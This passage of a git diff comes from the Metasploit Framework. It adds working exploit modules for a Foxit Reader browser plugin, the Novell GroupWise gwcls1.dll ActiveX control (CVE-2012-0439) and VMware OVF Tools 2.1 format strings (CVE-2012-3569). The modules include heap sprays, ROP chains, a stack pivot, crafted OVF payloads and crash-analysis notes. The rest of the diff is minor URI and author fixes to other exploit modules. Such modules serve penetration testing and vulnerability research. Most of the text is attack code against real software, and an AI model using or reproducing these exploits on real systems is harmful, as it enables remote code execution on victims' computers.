+ junk,
+ junk,
+ junk,
+ 0x41414141, # Filler (RETN offset compensation)
+ 0x00000040, # 0x00000040-> ecx
+ 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
+ 0x00000001, # 0x00000001-> ebx
+ 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
+ 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
+ 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
+ nops,
+ 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
+ ].flatten.pack("V*")
+
+ return rop_gadgets
+ end
+
+ def on_request_uri(cli, request)
+
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if no suitable target found
+ if my_target.nil?
+ print_error("Browser not supported, sending 404: #{agent}")
+ send_not_found(cli)
+ return
+ end
+
+ unless self.respond_to?(my_target[:rop])
+ print_error("Invalid target specified: no callback function defined")
+ send_not_found(cli)
+ return
+ end
+
+ return if ((p = regenerate_payload(cli)) == nil)
+
+ # we use two responses:
+ # one for an HTTP 301 redirect and sending the payload
+ # and one for sending the HTTP 200 OK with appropriate Content-Type
+ if request.resource =~ /\.pdf$/
+ # sending Content-Type
+ resp = create_response(200, "OK")
+ resp.body = ""
+ resp['Content-Type'] = 'application/pdf'
+ resp['Content-Length'] = rand_text_numeric(3,"0")
+ cli.send_response(resp)
+ return
+ else
+ resp = create_response(301, "Moved Permanently")
+ resp.body = ""
+
+ my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+ if datastore['SSL']
+ schema = "https"
+ else
+ schema = "http"
+ end
+
+ sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
+ sploit << [my_target.ret].pack("V") # EIP
+ sploit << [my_target['WritableAddress']].pack("V") # Writable Address
+ sploit << self.send(my_target[:rop])
+ sploit << p.encoded
+
+ resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
+ cli.send_response(resp)
+
+ # handle the payload
+ handler(cli)
+ end
+ end
+
+end
diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
index 8b36b5e4a211..7aa41c04fe60 100644
--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -48,6 +48,7 @@ def initialize(info={})
[ 'CVE', '2012-4792' ],
[ 'US-CERT-VU', '154201' ],
[ 'BID', '57070' ],
+ [ 'MSB', 'MS13-008' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],
diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
index cee5f962a616..a7ba46418a31 100644
--- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
+++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
@@ -49,7 +49,7 @@ def initialize(info = {})
'Author' =>
[
'unknown', # discovered in the wild
- '@yuange1975', # PoC posted to twitter
+ 'Yuange', # PoC posted to twitter under @yuange1975
'Matteo Memelli', # exploit-db version
'jduck' # Metasploit module
],
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
new file mode 100644
index 000000000000..1b6971b5c26a
--- /dev/null
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -0,0 +1,320 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
+ include Msf::Exploit::Remote::BrowserAutopwn
+
+ autopwn_info({
+ :ua_name => HttpClients::IE,
+ :ua_minver => "6.0",
+ :ua_maxver => "9.0",
+ :javascript => true,
+ :os_name => OperatingSystems::WINDOWS,
+ :rank => NormalRanking,
+ :classid => "{601D7813-408F-11D1-98D7-444553540000}",
+ :method => "SetEngine"
+ })
+
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",
+ 'Description' => %q{
+ This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll
+ ActiveX. Several methods in the GWCalServer control use user provided data as
+ a pointer, which allows to read arbitrary memory and execute arbitrary code. This
+ module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The
+ JRE6 needs to be installed to achieve ASLR bypass.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-0439' ],
+ [ 'OSVDB', '89700' ],
+ [ 'BID' , '57658' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ],
+ [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ 'Space' => 1040,
+ 'DisableNops' => true
+ },
+ 'DefaultOptions' =>
+ {
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # gwcls1.dll 12.0.0.8586
+ [ 'Automatic', {} ],
+ [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],
+ [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],
+ [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ],
+ [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],
+ [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x3e3' } ],
+ [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3e3' } ],
+ [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3ed' } ]#'0x5fe' } ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jan 30 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+ ], self.class)
+
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+ ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+ ie_name = "IE #{ie}"
+
+ case nt
+ when '5.1'
+ os_name = 'Windows XP SP3'
+ when '6.0'
+ os_name = 'Windows Vista'
+ when '6.1'
+ os_name = 'Windows 7'
+ end
+
+ targets.each do |t|
+ if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+ print_status("Target selected as: #{t.name}")
+ return t
+ end
+ end
+
+ return nil
+ end
+
+ def ie_heap_spray(my_target, p)
+ js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
+ js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+ js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+
+ # Land the payload at 0x0c0c0c0c
+ case my_target
+ when targets[7]
+ # IE 9 on Windows 7
+ js = %Q|
+ function randomblock(blocksize)
+ {
+ var theblock = "";
+ for (var i = 0; i < blocksize; i++)
+ {
+ theblock += Math.floor(Math.random()*90)+10;
+ }
+ return theblock;
+ }
+
+ function tounescape(block)
+ {
+ var blocklen = block.length;
+ var unescapestr = "";
+ for (var i = 0; i < blocklen-1; i=i+4)
+ {
+ unescapestr += "%u" + block.substring(i,i+4);
+ }
+ return unescapestr;
+ }
+
+ var heap_obj = new heapLib.ie(0x10000);
+ var code = unescape("#{js_code}");
+ var nops = unescape("#{js_random_nops}");
+ while (nops.length < 0x80000) nops += nops;
+ var offset_length = #{my_target['Offset']};
+ for (var i=0; i < 0x1000; i++) {
+ var padding = unescape(tounescape(randomblock(0x1000)));
+ while (padding.length < 0x1000) padding+= padding;
+ var junk_offset = padding.substring(0, offset_length);
+ var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
+ while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
+ sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
+ heap_obj.alloc(sprayblock);
+ }
+ |
+
+ else
+ # For IE 6, 7, 8
+ js = %Q|
+ var heap_obj = new heapLib.ie(0x20000);
+ var code = unescape("#{js_code}");
+ var nops = unescape("#{js_nops}");
+ while (nops.length < 0x80000) nops += nops;
+ var offset = nops.substring(0, #{my_target['Offset']});
+ var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+ heap_obj.gc();
+ for (var i=1; i < 0x300; i++) {
+ heap_obj.alloc(block);
+ }
+ var overflow = nops.substring(0, 10);
+ |
+
+ end
+
+ js = heaplib(js, {:noobfu => true})
+
+ if datastore['OBFUSCATE']
+ js = ::Rex::Exploitation::JSObfu.new(js)
+ js.obfuscate
+ end
+
+ return js
+ end
+
+ def stack_pivot
+ pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
+ pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
+ pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
+ pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
+ return pivot
+ end
+
+ def get_payload(t, cli)
+ code = payload.encoded
+
+ # No rop. Just return the payload.
+ return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil?
+
+ # Both ROP chains generated by mona.py - See corelan.be
+ case t['Rop']
+ when :msvcrt
+ print_status("Using msvcrt ROP")
+ rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
+ jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string
+ rop_payload << jmp_shell
+ rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length)
+ rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset
+ rop_payload << [0x77c15ed5].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret
+ rop_payload << stack_pivot
+ rop_payload << code
+ else
+ print_status("Using JRE ROP")
+ rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
+ jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string
+ rop_payload << jmp_shell
+ rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length)
+ rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset
+ rop_payload << [0x7C348B05].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret
+ rop_payload << stack_pivot
+ rop_payload << code
+ end
+
+ return rop_payload
+ end
+
+
+ def load_exploit_html(my_target, cli)
+ p = get_payload(my_target, cli)
+ js = ie_heap_spray(my_target, p)
+
+ trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200
+
+ html = %Q|
+ <html>
+ <head>
+ <script>
+ #{js}
+ </script>
+ </head>
+ <body>
+ <object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'>
+ </object>
+ <script>
+ target.SetEngine(0x0c0c0c0c-0x20);
+ setInterval(function(){#{trigger}},1000);
+ </script>
+ </body>
+ </html>
+ |
+
+ return html
+ end
+
+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ uri = request.uri
+ print_status("Requesting: #{uri}")
+
+ my_target = get_target(agent)
+ # Avoid the attack if no suitable target found
+ if my_target.nil?
+ print_error("Browser not supported, sending 404: #{agent}")
+ send_not_found(cli)
+ return
+ end
+
+ html = load_exploit_html(my_target, cli)
+ html = html.gsub(/^\t\t/, '')
+ print_status("Sending HTML...")
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+end
+
+
+=begin
+
+* Remote Code Exec
+
+(240.8d4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll -
+eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58
+eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
+gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d:
+10335e2d 8a8e4f040000 mov cl,byte ptr [esi+44Fh] ds:0023:0c0c103b=??
+
+
+.text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20
+.text:103BDDEF test esi, esi
+.text:103BDDF1 jnz short loc_103BDE17
+.text:103BDDF3 cmp [eax+426h], esi
+.text:103BDDF9 jz short loc_103BDE17 // Check function pointer against nil?
+.text:103BDDFB mov ecx, [ebp+arg_8]
+.text:103BDDFE mov edx, [ebp+arg_4]
+.text:103BDE01 push ecx
+.text:103BDE02 mov ecx, [eax+42Ah] // Carefully crafted object allows to control it
+.text:103BDE08 push edx
+.text:103BDE09 mov edx, [eax+426h] // Carefully crafted object allows to control it
+.text:103BDE0F push ecx
+.text:103BDE10 call edx // Win!
+
+* Info Leak
+
+// Memory disclosure => 4 bytes from an arbitrary address
+// Unstable when info leaking and triggering rce path...
+target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll
+var leak = target.GetMiscAccess();
+alert(leak);
+
+=end
\ No newline at end of file
diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb
new file mode 100644
index 000000000000..fa3681ff88f2
--- /dev/null
+++ b/modules/exploits/windows/browser/ovftool_format_string.rb
@@ -0,0 +1,134 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'VMWare OVF Tools Format String Vulnerability',
+ 'Description' => %q{
+ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
+ Windows. The vulnerability occurs when printing error messages while parsing a
+ a malformed OVF file. The module has been tested successfully with VMWare OVF Tools
+ 2.1 on Windows XP SP3.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jeremy Brown', # Vulnerability discovery
+ 'juan vazquez' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-3569' ],
+ [ 'OSVDB', '87117' ],
+ [ 'BID', '56468' ],
+ [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'BadChars' =>
+ (0x00..0x08).to_a.pack("C*") +
+ "\x0b\x0c\x0e\x0f" +
+ (0x10..0x1f).to_a.pack("C*") +
+ (0x80..0xff).to_a.pack("C*") +
+ "\x22",
+ 'StackAdjustment' => -3500,
+ 'PrependEncoder' => "\x54\x59", # push esp # pop ecx
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'ECX',
+ 'BufferOffset' => 6
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # vmware-ovftool-2.1.0-467744-win-i386.msi
+ [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
+ {
+ 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
+ 'AddrPops' => 98,
+ 'StackPadding' => 38081,
+ 'Alignment' => 4096
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Nov 08 2012',
+ 'DefaultTarget' => 0))
+
+ end
+
+ def ovf
+ my_payload = rand_text_alpha(4) # ebp
+ my_payload << [target.ret].pack("V") # eip # call esp
+ my_payload << payload.encoded
+
+ fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
+ fs << rand_text_alpha(target['Alignment']) # Align to 0x11000
+ fs << my_payload
+ # 65536 => 0x10000
+ # 27 => Error message prefix length
+ fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
+ fs << "%08x" * target['AddrPops'] # Reach saved EBP
+ fs << "%hn" # Overwrite LSW of saved EBP with 0x1000
+
+ ovf_file = <<-EOF
+<?xml version="1.0" encoding="UTF-8"?>
+<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"
+xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"
+xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
+xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"
+xmlns:vmw="http://www.vmware.com/schema/ovf"
+xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+ <References>
+ <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
+ </References>
+ <DiskSection>
+ <Info>Virtual disk information</Info>
+ <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
+ </DiskSection>
+ <VirtualSystem ovf:id="Small VM">
+ <Info>A virtual machine</Info>
+ </VirtualSystem>
+</Envelope>
+ EOF
+ ovf_file
+ end
+
+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ uri = request.uri
+
+ if agent !~ /VMware-client/ or agent !~ /ovfTool/
+ print_status("User agent #{agent} not recognized, answering Not Found...")
+ send_not_found(cli)
+ end
+
+ if uri =~ /.mf$/
+ # The manifest file isn't required
+ print_status("Sending Not Found for Manifest file request...")
+ send_not_found(cli)
+ end
+
+ print_status("Sending OVF exploit...")
+ send_response(cli, ovf, {'Content-Type'=>'text/xml'})
+ end
+
+end
\ No newline at end of file
diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
index a8ba842b7e16..2e2ad87d3fa1 100644
--- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
@@ -25,8 +25,7 @@ def initialize(info = {})
'Author' =>
[
'Unknown', # 0day found in the wild
- '@sn0wfl0w', # initial analysis
- '@vicheck', # initial analysis
+ 'sn0wfl0w', # initial analysis, also @vicheck on twitter
'jduck' # Metasploit module
],
'References' =>
diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb
new file mode 100644
index 000000000000..cbd21fed2aae
--- /dev/null
+++ b/modules/exploits/windows/fileformat/ovf_format_string.rb
@@ -0,0 +1,119 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'VMWare OVF Tools Format String Vulnerability',
+ 'Description' => %q{
+ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
+ Windows. The vulnerability occurs when printing error messages while parsing a
+ a malformed OVF file. The module has been tested successfully with VMWare OVF Tools
+ 2.1 on Windows XP SP3.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jeremy Brown', # Vulnerability discovery
+ 'juan vazquez' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-3569' ],
+ [ 'OSVDB', '87117' ],
+ [ 'BID', '56468' ],
+ [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'BadChars' =>
+ (0x00..0x08).to_a.pack("C*") +
+ "\x0b\x0c\x0e\x0f" +
+ (0x10..0x1f).to_a.pack("C*") +
+ (0x80..0xff).to_a.pack("C*") +
+ "\x22",
+ 'StackAdjustment' => -3500,
+ 'PrependEncoder' => "\x54\x59", # push esp # pop ecx
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'ECX',
+ 'BufferOffset' => 6
+ }
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # vmware-ovftool-2.1.0-467744-win-i386.msi
+ [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
+ {
+ 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
+ 'AddrPops' => 98,
+ 'StackPadding' => 38081,
+ 'Alignment' => 4096
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Nov 08 2012',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']),
+ ], self.class)
+ end
+
+ def ovf
+ my_payload = rand_text_alpha(4) # ebp
+ my_payload << [target.ret].pack("V") # eip # call esp
+ my_payload << payload.encoded
+
+ fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
+ fs << rand_text_alpha(target['Alignment']) # Align to 0x11000
+ fs << my_payload
+ # 65536 => 0x10000
+ # 27 => Error message prefix length
+ fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
+ fs << "%08x" * target['AddrPops'] # Reach saved EBP
+ fs << "%hn" # Overwrite LSW of saved EBP with 0x1000
+
+ ovf_file = <<-EOF
+<?xml version="1.0" encoding="UTF-8"?>
+<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"
+xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"
+xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
+xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"
+xmlns:vmw="http://www.vmware.com/schema/ovf"
+xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+ <References>
+ <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
+ </References>
+ <DiskSection>
+ <Info>Virtual disk information</Info>
+ <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
+ </DiskSection>
+ <VirtualSystem ovf:id="Small VM">
+ <Info>A virtual machine</Info>
+ </VirtualSystem>
+</Envelope>
+ EOF
+ ovf_file
+ end
+
+ def exploit
+ print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1")
+ file_create(ovf)
+ end
+end
diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
index 253866b1c89d..be89cbc5a488 100644
--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -103,7 +103,7 @@ def exploit
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
- 'uri' => normalize_uri(target_uri.to_s),
+ 'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'headers' =>
{
diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
index c73b3b2499c1..34857f9f84e1 100644
--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
+++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
@@ -62,7 +62,7 @@ def initialize(info={})
def check
- res = send_request_raw({'uri'=>normalize_uri(target_uri.host)})
+ res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
return Exploit::CheckCode::Vulnerable
diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb
index e0959186453e..3fd2b947b875 100644
--- a/modules/exploits/windows/http/sybase_easerver.rb
+++ b/modules/exploits/windows/http/sybase_easerver.rb
@@ -70,7 +70,7 @@ def exploit
# Sending the request
res = send_request_cgi({
- 'uri' => normalize_uri(datastore['DIR']) + '/Login.jsp?' + crash,
+ 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash,
'method' => 'GET',
'headers' => {
'Accept' => '*/*',
diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb
index 76322d9aab6e..1e678f874d81 100644
--- a/modules/exploits/windows/http/sysax_create_folder.rb
+++ b/modules/exploits/windows/http/sysax_create_folder.rb
@@ -126,12 +126,12 @@ def get_sid
pass = datastore['SysaxPASS']
creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}"
- uri = normalize_uri(target_uri.to_s)
+ uri = target_uri.path
# Login to get SID value
r = send_request_cgi({
'method' => "POST",
- 'uri' => "#{uri}/scgi?sid=0&pid=dologin",
- 'data' => creds
+ 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"),
+ 'data' => creds
})
# Parse response for SID token
@@ -146,9 +146,9 @@ def get_root_path(sid)
# Find the path because it's used to help calculate the offset
random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir
- uri normalize_uri(target_uri.to_s)
+ uri = normalize_uri(target_uri.path)
r = send_request_cgi({
- 'uri' => "#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm",
+ 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"),
'method' => 'POST',
})
@@ -182,9 +182,9 @@ def exploit
post_data = Rex::MIME::Message.new
post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"")
post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669"
- uri = normalize_uri(target_uri.to_s)
+ uri = normalize_uri(target_uri.path)
r = send_request_cgi({
- 'uri' => "#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm",
+ 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"),
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb
index 137a1686c862..b97524a3df7f 100644
--- a/modules/exploits/windows/iis/ms02_065_msadc.rb
+++ b/modules/exploits/windows/iis/ms02_065_msadc.rb
@@ -85,7 +85,7 @@ def exploit
data = 'Content-Type: ' + sploit
res = send_request_raw({
- 'uri' => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query',
+ 'uri' => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'),
'headers' =>
{
'Content-Length' => data.length,
diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb
index 60d1f7b81448..d3383308dfc0 100644
--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -128,7 +128,7 @@ def exec_cmd(sql, cmd, d)
data << sploit
res = send_request_raw({
- 'uri' => normalize_uri(datastore['PATH']) + '/' + method,
+ 'uri' => normalize_uri(datastore['PATH'], method),
'agent' => 'ACTIVEDATA',
'headers' =>
{
@@ -200,7 +200,7 @@ def find_exec
data << "\r\n\r\n--#{boundary}--\r\n"
res = send_request_raw({
- 'uri' => normalize_uri(datastore['PATH']) + '/VbBusObj.VbBusObjCls.GetMachineName',
